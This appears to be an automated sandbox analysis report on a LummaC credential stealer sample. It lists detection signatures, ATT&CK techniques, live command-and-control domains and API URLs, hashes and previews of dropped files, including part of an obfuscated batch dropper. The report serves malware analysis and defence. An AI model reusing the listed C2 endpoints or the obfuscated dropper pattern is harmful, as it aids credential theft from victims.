Source: Place.pif	Binary or memory string: WIN_VISTA
Source: Place.pif	Binary or memory string: WIN_7
Source: Place.pif	Binary or memory string: WIN_8
Source: Hit.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match

File source: Process Memory Space: Place.pif PID: 7132, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Place.pif PID: 7132, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005F696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		11_2_005F696E
Source: C:\Users\user\AppData\Local\Temp\756341\Place.pif	Code function: 11_2_005F6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		11_2_005F6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	21 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	37 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	11 Masquerading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Okfjk1hs4kdhs2.exe	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\756341\Place.pif	5%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
faulteyotk.site	104.21.9.13	true	true		unknown
XoihaBktBfpQRsABjqvzDOKOlj.XoihaBktBfpQRsABjqvzDOKOlj	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Reputation
servicedny.site	true	unknown
goalyfeastz.site	true	unknown
contemteny.site	true	unknown
opposezmny.site	true	unknown
https://faulteyotk.site/api	true	unknown
authorisev.site	true	unknown
faulteyotk.site	true	unknown
seallysl.site	true	unknown
dilemmadu.site	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://faulteyotk.site/apit	Place.pif, 0000000B.00000003.2708119609.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709228638.00000000013B7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	false		unknown
https://duckduckgo.com/chrome_newtab	Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://faulteyotk.site/y?	Place.pif, 0000000B.00000003.2640382833.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://faulteyotk.site/apiz	Place.pif, 0000000B.00000003.2708172110.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709113133.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_ErrorError	Okfjk1hs4kdhs2.exe	false	URL Reputation: safe	unknown
https://faulteyotk.site/	Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709228638.00000000013B7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.autoitscript.com/autoit3/	Okfjk1hs4kdhs2.exe, 00000000.00000003.2078289262.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2585910317.00000000046BA000.00000004.00000800.00020000.00000000.sdmp, Place.pif.2.dr, Hit.0.dr	false		unknown
https://www.ecosia.org/newtab/	Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Place.pif, 0000000B.00000003.2641397218.00000000054BA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://faulteyotk.site:443/apil	Place.pif, 0000000B.00000002.2708950114.000000000111D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://faulteyotk.site/pi	Place.pif, 0000000B.00000003.2708119609.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000002.2709228638.00000000013B7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Place.pif, 0000000B.00000003.2639808386.000000000440F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://faulteyotk.site/3	Place.pif, 0000000B.00000003.2640382833.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://faulteyotk.site/4	Place.pif, 0000000B.00000002.2709113133.00000000012C5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	Place.pif, 0000000B.00000003.2641397218.00000000054BA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://faulteyotk.site/.	Place.pif, 0000000B.00000003.2640382833.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, Place.pif, 0000000B.00000003.2642043750.00000000013B4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Place.pif, 0000000B.00000003.2613589389.0000000004427000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.9.13	faulteyotk.site	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543812
Start date and time:	2024-10-28 14:06:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Okfjk1hs4kdhs2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/13@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 94 Number of non-executed functions: 301
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Okfjk1hs4kdhs2.exe

Simulations

Behavior and APIs

Time	Type	Description
09:07:42	API Interceptor	23x Sleep call for process: Place.pif modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	https://riocel.cl/74584847.pdf	Get hash	malicious	HtmlDropper	Browse	172.67.190.229
	Salary_Structure_Benefits_for_KchaneyIyNURVhUTlVNUkFORE9NMTkjIw== copy.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://onedrive.live.com/redir?resid=4F2A159F00FAB59%21138&authkey=%21ACaxJyMcnWh5xNs&page=View&wd=target%28Quick%20Notes.one%7C67689295-af57-4401-850f-57555db87326%2FNORTHEAST%20MICHIGAN%20COMMUNITY%20MENTAL%20HEALTH%C2%A0%20AUTHORITY%7C3ded3aeb-9f7f-4190-94f3-06088ff2e9af%2F%29&wdorigin=NavigationUrl	Get hash	malicious	Unknown	Browse	104.21.92.20
	https://onedrive.live.com/redir?resid=4F2A159F00FAB59%21138&authkey=%21ACaxJyMcnWh5xNs&page=View&wd=target%28Quick%20Notes.one%7C67689295-af57-4401-850f-57555db87326%2FNORTHEAST%20MICHIGAN%20COMMUNITY%20MENTAL%20HEALTH%C2%A0%20AUTHORITY%7C3ded3aeb-9f7f-4190-94f3-06088ff2e9af%2F%29&wdorigin=NavigationUrl	Get hash	malicious	Unknown	Browse	172.67.184.252
	https://shared.outlook.inky.com/link?domain=ctrk.klclick.com&t=h.eJx1zT1vwjAUheG_gjyX2E4ItpkoQgJlqGgUqWNlGzu1cvMh-2ZAFf8dJUO37s857y-ZI5DDhvwgTulAqcXYZR1YCLbL7NhToIxX76K5FNdzw9mtvtQf1dfts2rq0zcjbxvSLfs2mKgBddyaOYXBpbS1egqogcbRRXRw_CPGrs--9LkSd--5LbksuVHGi72WO6WkZCKnXORqLwvBimxXLiW3ljAAuMexnbDXg25d7wZMI8wYxiEtzwu9r_R_8nwBLatRZw.MEYCIQCSahzZW_4sDNrHIm-tqOS-MfCLNun8fj_Bxq7Zj7FBvQIhAKVsQPfH8EnP8IAulYo78COUXm3bMhbNANS-wTC8S6QO#bW1vc2VyQHNreWxpbmUtaG9sdC5jb20=	Get hash	malicious	HTMLPhisher	Browse	172.67.155.190
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	104.21.9.13
	file.exe	Get hash	malicious	LummaC	Browse	104.21.9.13
	file.exe	Get hash	malicious	LummaC	Browse	104.21.9.13
	NetCDF4Excel_3_3_setup.exe	Get hash	malicious	Unknown	Browse	104.21.9.13
	file.exe	Get hash	malicious	LummaC	Browse	104.21.9.13
	file.exe	Get hash	malicious	LummaC	Browse	104.21.9.13
	file.exe	Get hash	malicious	LummaC	Browse	104.21.9.13
	S6DgRF1SSD.xlsx	Get hash	malicious	Unknown	Browse	104.21.9.13
	file.exe	Get hash	malicious	LummaC	Browse	104.21.9.13
	file.exe	Get hash	malicious	LummaC	Browse	104.21.9.13

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\756341\Place.pif	1XZFfxyWZA.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar	Browse
	ZnPyVAOUBc.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	1WDpq6mvnr.exe	Get hash	malicious	Unknown	Browse
	1WDpq6mvnr.exe	Get hash	malicious	Unknown	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	SecuriteInfo.com.Win32.Malware-gen.11524.25894.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.Malware-gen.11524.25894.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\756341\Place.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: 1XZFfxyWZA.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: ZnPyVAOUBc.exe, Detection: malicious, Browse Filename: 1WDpq6mvnr.exe, Detection: malicious, Browse Filename: 1WDpq6mvnr.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.11524.25894.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.11524.25894.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\756341\V

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	502502
Entropy (8bit):	7.999671677543553
Encrypted:	true
SSDEEP:	12288:lD71myF+WOMT0ktqhkQqgXaUgpeQsqydyEjdNJKu02:l7hF+qf4AgqbkLFZjIv2
MD5:	90933DE054A740F6F669C6B639D64217
SHA1:	CF71ABF19EF7B50D44E822F680BFA6CC7248C7D1
SHA-256:	CDC9D7F622F2824535D401D90568046B5FD79FD00B73D6FCF39C2D3486A84845
SHA-512:	D8C90A75A605F4E5D67FC6F23BE2995182A1C8E3128E6764D599F76FCDB71EF69409F3B59656D8113AE8C684EB23C932A289C0D2240BD012751C1BDF68B4D204
Malicious:	false
Preview:	.4.o...,>...wE.......#'..<I..h....c.J).<.I.)x.0..<.!.G..j.....y....K.....7.Mx.n...UGp1...G.q..v.D3..a.,...x.,.U.E.2C.{..6...grtA..).MW.oC6..........39...WP@E..[6.(]....Pn..hq./..{h.._nb.....n...vc...A.3.Z.2..j.... ^._'......Q..sD._9R...\0..........f..,.1;Z.Ne....L.{.\|....O...<z........j........v1.9.m.....j.Et..../.....Ne.4m....HM.G.0..0"S;.Wm..........#.n..qW.&..K.I.g.....$.#.R.is....e.xA.4ZF.+..]I0]W,\.3k...uL..5..>5.....a._.......U#.....7....s..9...N.\.`.N.....x..f;..N$..j....I.U...Y.!..?...#V...0.8.....8\VW../.RK_.m&,..g..U.c..0..V...?..).e..,..ZHV.W..Q....;..fi(.lR..hgzc...).W.e.n+F...{$...~b....(....P....zD......={.D...E..&......~..<8..Y)s..h....Cu]S..>.t......{.......r..X......c<.+.n1.dk.A..........r.uD.<}T...:.\|Pg.q..fb1e.g+...(...I......S......U...<...[).QO....Gi.X..M7O..&.I.Q.6m.\....U..tF4*...[.mk.>.5......=..flY..e..\.R........o..v..]...p...N(.....c.<59.....W>.z.........&\i5F...d....A_)g......A....D..._...g...X.G9o.............

C:\Users\user\AppData\Local\Temp\Abuse

Download File

Process:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
File Type:	data
Category:	dropped
Size (bytes):	5303
Entropy (8bit):	6.06255560814079
Encrypted:	false
SSDEEP:	96:jlxgUzr4tgOwVAfBzDICS09CAi6R7u+IhsObfS+NsPvj6ooxdofjxP5:PHAeOqAFDw09CV/2nPvj6DdMP5
MD5:	8BF4D73B3193536BE35E21B618724060
SHA1:	156DE4E299FDA3C5BA01E5A4875D7CACE4D780D1
SHA-256:	05C0A5E891C50BB5B31197063CB88D39430A86D09F2DA2AA2D706110635D77A2
SHA-512:	A75ADB622D4DC2B933F0C98CF5162EF7E1800B550D954B82E6F88B305836242008839EAB4B53EC2C0182B3904E7BAA72498B1A4DA7F7008276972A147C284D29
Malicious:	false
Preview:	MENTIONSTATICARGUEKEEPS..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.......................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Belly

Download File

Process:	C:\Users\user\Desktop\Okfjk1hs4kdhs2.exe
File Type:	ASCII text, with very long lines (971), with CRLF line terminators
Category:	dropped
Size (bytes):	26639
Entropy (8bit):	5.080470640564056
Encrypted:	false
SSDEEP:	768:9l1+bVjy5qRkq7dVQ54MKA0oGBf7Hw0Ps:9lsbgTqFMmoEf7m
MD5:	56C6442327665146EF28AEC5984E03D1
SHA1:	17B01D4494727C040E0685C02B9B7D9CBC20080F
SHA-256:	568459AE98CA60047D86EAD844A362667F819C8531D13A120426AE914A74B646
SHA-512:	2E2C5B93D3ADC1C6B2430FEDAF5FD30A3A3F864E3A0A75B5FE8BAF3A576D2335D250CF015B83984C479A479BC2A88C368E4E7DE98CBA53FBDC6300542A6DB144
Malicious:	false
Preview:	Set Backing=O..SxjWaste-Ministries-..IgJWDaisy-Frankfurt-..VHFWide-Wisconsin-Than-When-Updated-Meets-Behind-Yea-Pod-..bshGKeno-Adjacent-One-Routers-..lkcRio-Titten-Pocket-..ihDjAlternatively-Shows-Missouri-Way-Healing-Elegant-..TDgSomething-Feeling-Pointer-Nearby-Teaching-Synopsis-Lamb-Elite-..YKNDCouncil-Amendment-Taxation-Flood-Ste-Highway-..lIShakespeare-Rug-..Set Request=I..RkMBGuaranteed-Hawaiian-..wAFy-Skilled-Increasingly-..mcJCourse-Valley-Bankruptcy-Lips-Inquiries-..JLYReservations-Apps-Entire-Contacts-Upper-Squirting-..sSzMan-Cattle-Cards-..ozSuImport-..Set Dozen=m..alTvRelaxation-Bobby-Compiled-Daniel-..GRiSWizard-Territories-Shirts-..dQuDelay-Prompt-..ufPeripheral-Attempts-Greatly-..yxhQueue-River-Hydraulic-Shadow-Keep-Aims-..RQUnder-Nowhere-Kit-Ata-Manuals-..mpjrRecording-Enrollment-Oliver-Siemens-Supplied-Modify-..ksenHilton-..epFastest-Boat-Borough-Hampton-Taiwan-..Set Saints=e..fSRPhone-Processed-..rwyEight-..WcAttract-Restoration-Mat-..FJLTransparent-Keywords-Temperatu

C:\Users\user\AppData\Local\Temp\Belly.bat

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (971), with CRLF line terminators
Category:	dropped
Size (bytes):	26639
Entropy (8bit):	5.080470640564056
Encrypted:	false
SSDEEP:	768:9l1+bVjy5qRkq7dVQ54MKA0oGBf7Hw0Ps:9lsbgTqFMmoEf7m
MD5:	56C6442327665146EF28AEC5984E03D1
SHA1:	17B01D4494727C040E0685C02B9B7D9CBC20080F
SHA-256:	568459AE98CA60047D86EAD844A362667F819C8531D13A120426AE914A74B646
SHA-512:	2E2C5B93D3ADC1C6B2430FEDAF5FD30A3A3F864E3A0A75B5FE8BAF3A576D2335D250CF015B83984C479A479BC2A88C368E4E7DE98CBA53FBDC6300542A6DB144
Malicious:	false
